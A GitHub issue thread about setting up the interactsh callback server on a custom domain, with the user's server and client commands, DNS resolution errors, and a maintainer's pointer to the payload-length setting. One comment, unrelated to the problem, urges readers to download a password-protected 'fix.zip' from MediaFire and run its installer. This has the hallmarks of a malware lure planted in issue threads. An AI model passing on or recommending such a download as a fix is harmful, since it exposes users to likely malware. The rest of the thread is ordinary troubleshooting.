### ISSUE TITLE
Can't set it to run with custom domain

### ISSUE THREAD

**Issue by marcelo321** [projectdiscovery/interactsh#956]
Sorry to ask a dumb question, but can't get it to run properly.

I one tmux session I run:

```
interactsh-server -domain z.callback.domain.me -ip "realip" -wildcard -ldap -dns-port 54 -sa
[INF] Client Token: 12345
```

In other session I do:

```
interactsh-client -s z.callback.domain.me -dns-only -t 3ebbe6d1c0ed946926995b15d5e71bd7978fe1059746534fc9d775329d56c6f1 -cidl 10
[WRN] Use with caution. You are responsible for your actions
[WRN] Developers assume no liability and are not responsible for any misuse or damage.
[VER] Could not register to http://z.callback.domain.me: could not make register request: POST https://z.callback.domain.me/register giving up after 1 attempts: Post "https://z.callback.domain.me/register": dial tcp: lookup z.callback.domain.me: Temporary failure in name resolution, retrying with http
[VER] Could not register to z.callback.domain.me: could not make register request: POST http://z.callback.domain.me/register giving up after 1 attempts: Post "http://z.callback.domain.me/register": dial tcp: lookup z.callback.domain.me: Temporary failure in name resolution, retrying with remaining
[FTL] Could not create client: could not register to servers: could not make register request: POST http://z.callback.domain.me/register giving up after 1 attempts: Post "http://z.callback.domain.me/register": dial tcp: lookup z.callback.domain.me: Temporary failure in name resolution
```

In the DNS records I have:

`*.callback` to `"myreal ip"`

what am I missing? my domain points via A record to my vps. then I create the interactsh server and client.

When I visit the subdomain I see the:

"Interactsh Server" index page, yet it fails to do a register post request. previously i was actually able to pass this register test, but no callback were received at all. I only care about dns callbacks for this

**Comment by royalkush** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ehsandeep** [comment]
> Note: It is important and required to use same length on both side (client and server), otherwise co-relation will not work.

Ref https://github.com/projectdiscovery/interactsh?tab=readme-ov-file#custom-payload-length

**Comment by marcelo321** [comment]
thanks @ehsandeep! ok, so now I get it running, but I am not receive callbacks. Probably because on how the ds records are set in my namecheap configuration.

I got my domain `cr7jahfzzt.callback.domain.me` but when I do `dig cr7jahfzzt.callback.domain.me` I don't receive any callback at all and  `SERVFAIL` from the dig response

**Comment by marcelo321** [comment]
closing as resolved in discord server!
